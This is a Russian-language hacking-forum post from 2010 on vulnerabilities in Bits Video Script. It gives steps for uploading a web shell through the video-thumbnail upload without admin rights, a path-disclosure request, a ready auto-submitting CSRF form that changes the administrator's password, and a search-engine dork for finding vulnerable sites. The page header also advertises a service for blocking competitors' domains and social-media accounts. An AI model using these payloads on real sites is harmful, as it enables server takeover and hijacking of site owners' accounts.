Форум АНТИЧАТ - Уязвимости Bits Video Script

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Уязвимости Bits Video Script

Опции темы

Поиск в этой теме

Опции просмотра

Предыдущая

Предыдущее сообщение

Следующее сообщение

Следующая

Уязвимости Bits Video Script

#1

Старый

29.04.2010, 20:49

Аватар для seofilms

seofilms

Участник форума

Регистрация: 27.05.2009

Сообщений: 115

Провел на форуме:
2312554

Репутация: 97

По умолчанию

Уязвимости Bits Video Script

Заливка шелла без прав админа :

Заходим на сайт, регистрируемся : сайт/register.php, входим со своим логином и паролем, заходим сюда : сайт/addvideo.php там где thumbs выбираем свой шелл и заливаем его.
После заливки он находится здесь : cайт/thumbs/имявашегошелла.php

Видео о том как залить шелл : http://www.youtube.com/watch?v=v6AOwLg1v3w

Раскрытие путей :

PHP код:


		
			
сайт/search.php?search[]=way&searchsubmit=

csrf уязвимость

PHP код:


		
			
<form method=post action="http://сайт/admin/password.php" onsubmit="return checkform(this);" name="csrf"> 

<input type='text' name='password' value="НОВЫЙ ПАРОЛЬ КОТОРЫЙ ВЫ ПОСТАВИТЕ АДМИНИСТРАТОРУ">

</form> 

<script> 

document.csrf.submit();

</script>

Поисковой запрос

PHP код:


		
			
inurl:search.php?order=views

(C)forum.kidal.org

Последний раз редактировалось seofilms; 29.04.2010 в 21:06..

Ответить с цитированием

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблемы со звуком? Звуковой картой? Драйверами? )	spy-prof	Аппаратное обеспечение	24	18.04.2009 02:35
Куча скриптов =))	SK \| Heaton	PHP, PERL, MySQL, JavaScript	37	01.02.2008 15:23
Pубрика "Полезные решения на PHP"	Utochka	PHP, PERL, MySQL, JavaScript	28	23.05.2006 10:06
Новый Мултиплеер для GTA:VC - vc-mp	xSp1D3R	Болталка	5	16.08.2005 02:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход